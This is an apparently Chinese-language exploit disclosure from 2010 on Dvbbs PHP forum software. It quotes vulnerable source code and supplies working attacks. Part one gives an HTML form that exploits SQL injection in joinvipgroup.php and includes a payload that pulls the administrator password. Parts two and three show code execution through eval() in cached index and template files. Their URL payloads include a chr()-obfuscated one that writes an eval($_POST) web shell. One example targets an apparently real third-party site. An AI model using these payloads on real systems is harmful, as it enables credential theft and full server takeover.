|
Author: xhm1n9 [ESST]
EMail: xhm1n9#x-xox-x.com
Site: http://www.x-xox-x.com
Date: 2010-08-20
1,joinvipgroup.php //注入
function up_vipuser(){
global $lang,$db,$dv,$userid,$userinfo,$vipgroupuser;
$groupid=$_POST['vipgroupid'];
$btype=$_POST['Btype'];
$vipmoney=$_POST['vipmoney'];
$vipticket=$_POST['vipticket'];
if($groupid==0 or $vipmoney<0 or $vipticket<0){
showmsg($lang['join.info4']);
exit;
}
$issql=$db->scalar("SELECT count(1) FROM {$dv}usergroups WHERE parentgid=5 and usergroupid='".intval($groupid)."'");echo $issql;
if($issql>0 AND ($sql=$db->query("SELECT usergroupid,title,usertitle,groupsetting,grouppic FROM {$dv}usergroups WHERE parentgid=5 and usergroupid='".intval($groupid)."'"))){
while ($arr=$db->fetch_array($sql)){
$vipgroupsetting=explode(",",$arr['groupsetting']);
$upsetting=explode($lang['join.separator1'], $vipgroupsetting[71]);//'升级到该组所需金币数 金币数§点券数§有效天数§最低天数
if($btype==1){
$vipmoney=0;
if(intval($upsetting[3])>0){
$mustnum=$upsetting[3]*$upsetting[1]/$upsetting[2];
if($mustnum>0){
$mustnum=number_format($mustnum,0);
}else{
showmsg($lang['join.info5']);
exit;
}
}
if($userinfo['userticket']<$vipticket or $vipticket<$mustnum){
showmsg($lang['join.info6']);
exit;
}
$updats=$vipticket*$upsetting[2]/$upsetting[1];
$updats=intval(number_format($updats,0));
}else{
$vipticket=0;
if($upsetting[3]>0){
$mustnum=$upsetting[3]*$upsetting[0]/$upsetting[2];
if($mustnum>0){
$mustnum=number_format($mustnum,0);
}else{
showmsg($lang['join.info5']);
exit;
}
}
if($userinfo['usermoney']<$vipmoney || $vipmoney<$mustnum){echo "ri";
showmsg($lang['join.info7']);
exit;
}
$updats=$vipmoney*$upsetting[2]/$upsetting[0];
$updats=intval(number_format($updats,0));
}
if($vipgroupuser===true){
$db->query("UPDATE {$dv}user SET usergroupid=".$groupid.",userclass='".$arr['usertitle']."',titlepic='".$arr['grouppic']."',usermoney=usermoney-".$vipmoney.",userticket=userticket-".$vipticket.",vip_endtime='".($userinfo['vip_endtime']+$updates*24*3600)."' WHERE userid=".$userid."");
$db->query("UPDATE {$dv}online SET usergroupid='$groupid' Where userid=$userid");
}else{
$db->query("UPDATE {$dv}user SET usergroupid=".$groupid.",userclass='".$arr['usertitle']."',titlepic='".$arr['grouppic']."',usermoney=usermoney-".$vipmoney.",userticket=userticket-".$vipticket.",vip_endtime='".(TIME_NOW+$updates*24*3600)."',vip_startime='".TIME_NOW."' WHERE userid=".$userid."");
$db->query("UPDATE {$dv}online SET usergroupid='$groupid' Where userid=$userid");
}
..............................................................
$vipmoney变量没有过滤,利用前提是管理员设了vip会员组,有点金币:)
<title>test</title><form name="p_form" id="p_form" method="post" action="http://127.1/dvbbs/joinvipgroup.php?action=upvipuser" enctype="multipart/form-data">
<input id='img_thumb_final' name='vipmoney' type="text" value="0,useremail=123456">
<input id='img_thumb_final' name='vipticket' type="text" value="88">
<input id='img_thumb_final' name='vipgroupid' type="text" value="25">
<input id='img_thumb_final' name='Btype' type="text" value="">
<input name="sub" type="submit" value="提交" />
</form>
<!------------
0,userface=(select password from dv_admin where id=1) where userid=1#
!>
2,cache/static/index_0_0.php //执行漏洞
index.php
if($userid == 0){
$indexstatic= CACHE_PATH."static/index_0_".$boardid.".php";
}
else{
$indexstatic= CACHE_PATH."static/index_".$boardid.".php";
}
................................................
if((!$useindexstatic) || (!$useindexstatic_css) || $page>1 || $topicmode>0){
....................................
if($useindexstatic_css && $page < 2 && $topicmode==0){
$this_my_f= ob_get_contents(); //生成缓存文件
ob_end_clean();
to_static_php_file($indexstatic,$this_my_f);
}
...................................
}
..................................
function to_static_php_file($file_name,&$file_content)
{
if (is_file ($file_name)){
return true;
}
else{
$handle = fopen ($file_name,"w");
if (!is_writable ($file_name)){
return false;
}
if (!fwrite ($handle,$file_content)){
return false;
}
fclose ($handle);
return true;
}
}
写缓存生成的文件里有eval(),但文件顶部没有限制返问
<? eval("\$lang['tpl.str10']=\"{$lang['tpl.str10']}\";");?>
index_0_0.php?lang[tpl.str10]={${phpinfo()}}
3,templates/default/index.tpl.php //执行漏洞
<?
if( !defined('ISDVBBS') ){
header('HTTP/1.0 404 Not Found');
exit;
}
global $imgurl;
if($useindexstatic)
echo '<? eval("\$lang[\'tpl.str10\']=\"{$lang[\'tpl.str10\']}\";");?>';
else
eval("\$lang['tpl.str10']=\"{$lang['tpl.str10']}\";");
?>
.........................
index.php
...........//省略部份代码
if((!$useindexstatic) || (!$useindexstatic_css) || $page>1 || $topicmode>0){
if($useindexstatic_css &&$page < 2 && $topicmode==0){
$useindexstatic= true;
ob_start();
}
else
$useindexstatic= false;
include_once INC_PATH.'DV_Encoding.class.php';
$objenc =& DV_Encoding::GetEncoding($charset);
$lang = load_lang($lang, 'index' );
....................
首页调用模板,但没初始化$lang变量,只要满足if($useindexstatic_css &&$page < 2 && $topicmode==0)条件就能成功
例:http://www.flyingcity.cn/bbs/index.php?lang[tpl.str10]={${phpinfo()}}
index.php?lang[tpl.str10]={${phpinfo()}}
index.php?lang[tpl.str10]={${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(120).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(43).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(41).chr(63).chr(32).chr(62).chr(39).chr(41).chr(59))}} fputs(fopen('x.php','w+'),'<?eval($_POST[c])?>');
|
推荐
评论(0条)
